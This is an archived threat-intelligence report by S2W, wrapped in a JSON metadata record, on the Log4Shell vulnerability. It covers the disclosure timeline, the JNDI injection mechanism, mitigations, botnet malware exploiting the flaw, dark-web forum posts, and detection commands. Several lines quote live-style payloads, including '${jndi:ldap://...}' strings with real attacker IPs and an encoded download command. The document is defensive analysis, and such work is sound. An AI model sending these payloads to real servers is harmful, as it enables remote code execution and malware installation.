{
	"id": "9d622232-48b4-4a1d-85f9-cd0d86769ebd",
	"created_at": "2026-04-06T00:11:08.119584Z",
	"updated_at": "2026-04-10T13:12:34.573774Z",
	"deleted_at": null,
	"sha1_hash": "f983d1466408a000852e96c87551e7ea1c61ecd1",
	"title": "Logs of Log4shell (CVE-2021-44228): log4j is ubiquitous [EN]",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 3913070,
	"plain_text": "Logs of Log4shell (CVE-2021-44228): log4j is ubiquitous [EN]\r\nBy S2W\r\nPublished: 2021-12-23 · Archived: 2026-04-05 23:05:34 UTC\r\nDec 14, 2021\r\nAuthor: TALON | S2W\r\nLast Modified: 12/14/2021\r\nPhoto by NASA on Unsplash\r\nExecutive Summary\r\nVulnerability information about log4j, a library used for Java logging, was disclosed, and we analyzed it.\r\nThis report covers vulnerability-related posts on the dark web and current domestic and international responses; S2W's vulnerability analysis report was delivered exclusively to our customers through the Xarvis solution.\r\nVulnerability (CVE-2021-44228, log4shell)\r\nhttps://logging.apache.org/log4j/2.x/security.html\r\nhttps://issues.apache.org/jira/browse/LOG4J2-3201\r\nhttps://github.com/apache/logging-log4j2/pull/608\r\nhttps://medium.com/s2wblog/logs-of-log4shell-cve-2021-44228-log4j-is-ubiquitous-en-809064312039\r\nPage 1 of 18\n\nhttps://nvd.nist.gov/vuln/detail/CVE-2021-44228\r\nLog4shell-related timeline (Summary version)\r\n(2021.12.09.) log4shell disclosed on Twitter\r\nhttps://twitter.com/P0rZ9/status/1468949890571337731\r\n(2021.12.09.) Log4Shell: RCE 0-day exploit found in log4j 2, a popular Java logging package\r\n(2021.12.10.) Security advisories for services affected by this vulnerability, such as Apple, Amazon, Cloudflare, Minecraft, Steam, Tesla, Twitter, and Baidu\r\n(2021.12.11.) Tweeted that Alibaba Cloud Security reported the vulnerability in November.\r\n(2021.12.12.) 151 vendors issued related security advisories\r\nImplications\r\nSoftware vulnerabilities can occur at any time, and if a ubiquitous open-source component such as log4j is used, it is necessary to prepare in advance to tackle potential vulnerabilities when they occur.\r\nPeriodic asset identification is required for services used by internal infrastructures.\r\nMalware and attacks exploiting the vulnerability\r\nThere are cases of Mirai, Kinsing, and Muhstik being distributed by exploiting the unpatched vulnerability.\r\nIn addition, spray-and-pray attack attempts are continuously occurring.\r\nPosts related to the log4j vulnerability mentioned in DDW (Deep \u0026 Darkweb)\r\nIt was mentioned on a darkweb forum that users who uploaded leaked information from Tencent Cloud and Alibaba Cloud utilized the log4j vulnerability several times to attack Chinese-related companies.\r\nActionable Items (Appendix)\r\nAppendix.A: log4j RCE attack detection method and list of public detection tools\r\nAppendix.B: IoC and malware related to the vulnerability\r\nAppendix.C: Detection ruleset (Yara, Snort, Sigma)\r\nAppendix.D: Affected service information\r\nAppendix.E: About 151 Service Vendor Security Advisories (2021.12.12.)\r\nAppendix.F: Posts mentioned on the Deep \u0026 Dark Web\r\nSummary of CVE-2021-44228 (Log4shell)\r\nlog4j is an open-source Java logging library and is used by most projects running in Java.\r\nVersions affected by this vulnerability: Apache log4j 2.0 ~ 2.14.1\r\nIf you are using an affected version, see Appendix.A: How to detect log4j RCE attacks\r\nA brief summary of how the vulnerability is triggered\r\n1) Send the payload ${jndi:ldap://[ATTACKER_SERVER]/[MALICIOUS_CLASS]} in a request\r\n2) The server performs the lookup specified through the JNDI interface\r\n3) An adversary can carry out the attack by returning a malicious Java class in response to that request\r\nExample of the attack packet\r\nMitigation\r\n1) Update to log4j 2.15.0 or 2.15.0-RC2\r\nDownload\r\nhttps://logging.apache.org/log4j/2.x/download.html\r\n2) For versions 2.10.0 and later, set the formatMsgNoLookups property to true\r\nCommandline\r\necho \"export LOG4J_FORMAT_MSG_NO_LOOKUPS=true\" \u003e\u003e /etc/profile.d/blockzero.sh\r\n3) For versions below 2.10.0, change the log string pattern or remove the JndiLookup class from the classpath\r\nCommandline\r\nzip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class\r\nTimeline\r\n(2013.07.17.) The code that caused the vulnerability was committed to the repository [1]\r\n(2021.11.26.) CVE registered with MITRE [2]\r\n(2021.11.29.) Jira ticket related to the vulnerability created [3]\r\n(2021.11.30.) Patching work started in the GitHub repository [4]\r\n(2021.12.01.) First exploit seen by Cloudflare\r\n(2021.12.05.) Patch commit [5]\r\n(2021.12.06.) Patch announcement [6]\r\n(2021.12.09.) PoC disclosure\r\nhttps://www.lunasec.io/docs/blog/log4j-zero-day/ [7]\r\n(2021.12.10.) Attack targeting Minecraft detected [8]\r\n(2021.12.10.) Various services such as Apple, Amazon, Cloudflare, Minecraft, Steam, Tesla, Twitter, and Baidu are said to be affected by the vulnerability. [9]\r\n(2021.12.11.) Alibaba Cloud Security reported the vulnerability in November. [10]\r\n(2021.12.12.) Notice of security advisories related to 151 vendors — see Appendix.E\r\nRedistributing the updated patch on December 10 due to an incomplete patch released on December 6\r\n[Figure: Timeline]\r\nImplications\r\nSource: https://xkcd.com/2347/\r\nCharacteristics of open source\r\nAlthough it is used in many commercial services, log4j is a project run by about 3 or 4 main contributors, and we judge that verification and security review of the code itself are not performed systematically relative to the library's impact. However, in the case of log4j, the response was quite rapid. Kudos to the maintainers!\r\nThe JNDI injection attack technique used in this vulnerability was already presented at Black Hat in 2016. [12]\r\n1) The attacker binds the payload to a Naming/Directory service under their control.\r\n2) Inject URLs into vulnerable JNDI lookup methods\r\n3) The lookup is performed inside the application\r\n4) The application connects to the attacker-controlled Naming/Directory service\r\n5) Finally, the application decodes the response and triggers the payload.\r\nThe need for internal asset identification\r\nUnlike installations of commercial software and services, identifying assets that use such an open-source project is hard to track as an issue and hard to manage well.\r\nAdvance preparation required\r\nSoftware vulnerabilities can occur at any time, and if a ubiquitous open-source component such as log4j is used, it is necessary to prepare in advance to tackle potential vulnerabilities when they occur.\r\nPeriodic asset identification is required for services used by internal infrastructures.\r\nThere is a need to automate the tracking of specific open-source usage and notification of vulnerabilities.\r\nRelated Malware\r\nFor detailed IoC information related to the malware below, refer to Appendix.B\r\n1. Download command\r\nWe confirmed that malware distribution through CVE-2021-44228 comes in two forms; further variants are likely.\r\n${jndi:ldap://[ATTACKER_SERVER]/Basic/Command/Base64/[BASE64_CODE]}\r\nExample of malicious query\r\n${jndi:ldap://45.137.21.9:1389/Basic/Command/Base64/d2dldCBodHRwOi8vNjIuMjEwLjEzMC4yNTAvbGguc2g7Y2htb\r\n${jndi:ldap://[ATTACKER_SERVER]/[MALICIOUS_CLASS]}\r\nExample of malicious query\r\n${jndi:ldap://45.83.193.150:1389/Exploit}\r\n2. Types of distributed malware\r\nMirai\r\nMirai was first distributed in 2016 and is a botnet targeting IoT devices.\r\nThe infected system receives and executes commands from the C\u0026C server and is mainly used for DDoS attacks.\r\nKinsing\r\nKinsing is Golang-based malware that deploys a miner.\r\nThere are cases of it distributing malware targeting vulnerable Docker instances.\r\nIt installs a Monero miner on the infected system and includes a worm component that spreads the malware internally.\r\nMuhstik\r\nMuhstik distributes a miner targeting IoT devices and servers.\r\nIt installs a Monero miner and receives commands from an IRC server to perform malicious actions.\r\nTrending posts on Deep \u0026 Dark Web\r\nFor details of the log4j-related posts mentioned on the Deep \u0026 Dark Web, see Appendix.F\r\n1. Sharing Apache log4j vulnerability and PoC code\r\n(2021.12.10.) OO00O0000 in Raidforums mentioned that the scope of Apache log4j-related vulnerabilities and the expected damage are similar to the 2017 EternalBlue issue.\r\nIt was mentioned that more than 90% of application platforms developed based on Java are affected, along with the claim that the target server can be remotely controlled by exploiting this vulnerability.\r\n(2021.12.10.) Lipshitz in XSS wrote a thread to share vulnerability information, stating that the Minecraft server and many versions of Apache are affected by CVE-2021-44228.\r\n(2021.12.10.) Kelegen in XSS shared a GitHub link [13] where he posted information about currently attackable products and services.\r\n(2021.12.10.) Nowheretogo, Moderator of RAMP, explained log4j and mentioned that CVE-2021-40228 has been exploited since December 9, 2021.\r\n(2021.12.11.) l1nux in RAMP shared the exploitation results disclosed on Twitter [14], stating that the vulnerability works in VMware vCenter.\r\n(2021.12.11.) varwar in RAMP mentioned that the vulnerability also works in Ghidra and shared the exploitation results posted on Twitter [15]; a comment said that Ghidra is now patched and the vulnerability no longer works.\r\n2. Sharing Attack Use Cases\r\n(2021.12.10.) AgainstTheWest in Raidforums, who uploaded leaked information related to Tencent Cloud and Alibaba Cloud, used the log4j vulnerability several times to attack Chinese-related companies\r\n(2021.12.11.) PwnSec in XSS shared a GitHub repo [16] containing the PoC code for CVE-2021-44228, along with a Telegram channel sharing information about the new 0day RCE vulnerability.\r\nChecking the Telegram channel shared by the author of the post, we found proof images of the PoC code being tested against iCloud, Tesla, Amazon (CN), Baidu, LinkedIn, Cloudflare, Twitter, Minecraft, and Elastic-related services, along with information on the shared PoC code.\r\nAppendix: Actionable Items\r\nAppendix.A: log4j RCE attack detection method and the list of public detection tools\r\nDetection method in /var/log: Basic command\r\nNot compressed case\r\nsudo egrep -I -i -r '\\$(\\{|%7B)jndi:(ldap[s]?|rmi|dns):/[^\\n]+' /var/log\r\nCompressed case\r\nsudo find /var/log -name \\*.gz -print0 | xargs -0 zgrep -E -i '\\$(\\{|%7B)jndi:(ldap[s]?|rmi|dns):/[^\\n]+'\r\nDetection method in /var/log: Obfuscated or mutated instructions\r\nNot compressed case\r\nsudo find /var/log/ -type f -exec sh -c \"cat {} | sed -e 's/\\${lower://'g | tr -d '}' | egrep -I -i\r\nCompressed case\r\nsudo find /var/log/ -name \"*.log.gz\" -type f -exec sh -c \"zcat {} | sed -e 's/\\${lower://'g | tr -d\r\nS/W check command for software exposed to the vulnerability\r\nWindows: PowerShell command\r\ngci 'C:\\' -rec -force -include *.jar -ea 0 | foreach {select-string \"JndiLookup.class\" $_} | select -\r\nLinux: shell command\r\nfind / 2\u003e/dev/null -regex \".*.jar\" -type f | xargs -I{} grep JndiLookup.class \"{}\"\r\nDetection tools\r\nhttps://labrador.iotcube.com/scanner/LabradorLog4ShellDetector.jar\r\nAppendix.B: IoC related to CVE-2021-44228\r\nUSER-AGENT HTTP HEADER\r\nIP\r\nKINSING MINING ACTIVITY\r\nMIRAI INFECTION ACTIVITY\r\nMUHSTIK INFECTION ACTIVITY\r\nMIRAI INFECTION OTHER HASHES\r\nObserved Domains\r\nLinux Botnets (MIRAI / Muhstik)\r\n→ MIRAI\r\n→ Muhstik\r\nThe IoCs above were compiled from the sites listed under Related IoCs in the References at the bottom of the report, and the relevant IoCs are constantly being updated.\r\nIf you need to check only the IoCs listed in this report, you can check them in the Google Docs below.\r\nAppendix.C: Detection ruleset (Yara, Snort, Sigma)\r\n1. Yara rule\r\n2. Snort rule (Emergingthreat Open Rules)\r\n3. Sigma rule\r\nAppendix.D: Affected Software \u0026 Verified (as of 2021.12.13.) [18]\r\nAppendix.E: Log4Shell (CVE-2021-44228) Security Advisories\r\nPlease refer to the spreadsheet for the detailed advisories\r\n→ [S2W] Security Advisories / Bulletins linked to Log4Shell (CVE-2021-44228)\r\nAkamai, Apache Druid, Apache Flink, Apache LOG4J, Apache Kafka, Apache Solr, Apero CAS, APPSHEET, Apt\r\nAppendix.F: Status of Deep \u0026 Darkweb Posts\r\n1. Raidforums\r\nlog4j, log4shell search results (1 post)\r\n→ Apache Log4j explodes with high-risk vulnerabilities comparable to “eternal blue”, ne\r\nPost date: 2021.12.10.\r\nAuthor: OO00O0OO0\r\nAnalysis\r\nThe author of the post stated that the scope of Apache log4j-related vulnerabilities and the degree of expected damage are similar to the 2017 EternalBlue.\r\nIt is mentioned that more than 90% of application platforms developed based on Java are affected, along with the claim that the server can be remotely controlled by exploiting this vulnerability.\r\nAgainstTheWest in Raidforums, who uploaded leaked information related to Tencent Cloud and Alibaba Cloud, used the log4j vulnerability several times to attack Chinese-related companies\r\n2. XSS\r\nlog4j, log4shell search results (2 posts)\r\n→ 0day Log4j RCE Vulnerability ! ( 2021-44228 )\r\nPost date: 2021.12.11.\r\nAuthor: PwnSec\r\nAnalysis\r\nChecking the Telegram channel shared by the author of the post, we found proof images of the PoC code being tested against iCloud, Tesla, Amazon (CN), Baidu, LinkedIn, Cloudflare, Twitter, Minecraft, and Elastic-related services, along with information on the shared PoC code.\r\n→ CVE-2021-44228 Apache log4j RCE\r\nPost date: 2021.12.11.\r\nAuthor: Lipshitz\r\nAnalysis\r\n(2021.12.10.) Lipshitz in XSS wrote a thread to share vulnerability information, stating that the Minecraft server and many versions of Apache are affected by CVE-2021-44228.\r\n(2021.12.10.) Kelegen in XSS shared a GitHub link [13] where he posted information about currently attackable products and services.\r\n(2021.12.12.) Lipshitz in XSS shared code information available on Cloudflare.\r\nSource: https://medium.com/s2wblog/logs-of-log4shell-cve-2021-44228-log4j-is-ubiquitous-en-809064312039",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://medium.com/s2wblog/logs-of-log4shell-cve-2021-44228-log4j-is-ubiquitous-en-809064312039"
	],
	"report_names": [
		"logs-of-log4shell-cve-2021-44228-log4j-is-ubiquitous-en-809064312039"
	],
	"threat_actors": [
		{
			"id": "05b0c294-6e79-4d58-8291-73d2c1c7d9bd",
			"created_at": "2024-06-25T02:00:05.048321Z",
			"updated_at": "2026-04-10T02:00:03.665219Z",
			"deleted_at": null,
			"main_name": "BlueHornet",
			"aliases": [
				"APT49",
				"AgainstTheWest"
			],
			"source_name": "MISPGALAXY:BlueHornet",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "3fff98c9-ad02-401d-9d4b-f78b5b634f31",
			"created_at": "2023-01-06T13:46:38.376868Z",
			"updated_at": "2026-04-10T02:00:02.949077Z",
			"deleted_at": null,
			"main_name": "Cleaver",
			"aliases": [
				"G0003",
				"Operation Cleaver",
				"Op Cleaver",
				"Tarh Andishan",
				"Alibaba",
				"TG-2889",
				"Cobalt Gypsy"
			],
			"source_name": "MISPGALAXY:Cleaver",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "a6c351ea-01f1-4c9b-af75-cfbb3b269ed3",
			"created_at": "2023-01-06T13:46:39.390649Z",
			"updated_at": "2026-04-10T02:00:03.311299Z",
			"deleted_at": null,
			"main_name": "Kinsing",
			"aliases": [
				"Money Libra"
			],
			"source_name": "MISPGALAXY:Kinsing",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434268,
	"ts_updated_at": 1775826754,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/f983d1466408a000852e96c87551e7ea1c61ecd1.pdf",
		"text": "https://archive.orkl.eu/f983d1466408a000852e96c87551e7ea1c61ecd1.txt",
		"img": "https://archive.orkl.eu/f983d1466408a000852e96c87551e7ea1c61ecd1.jpg"
	}
}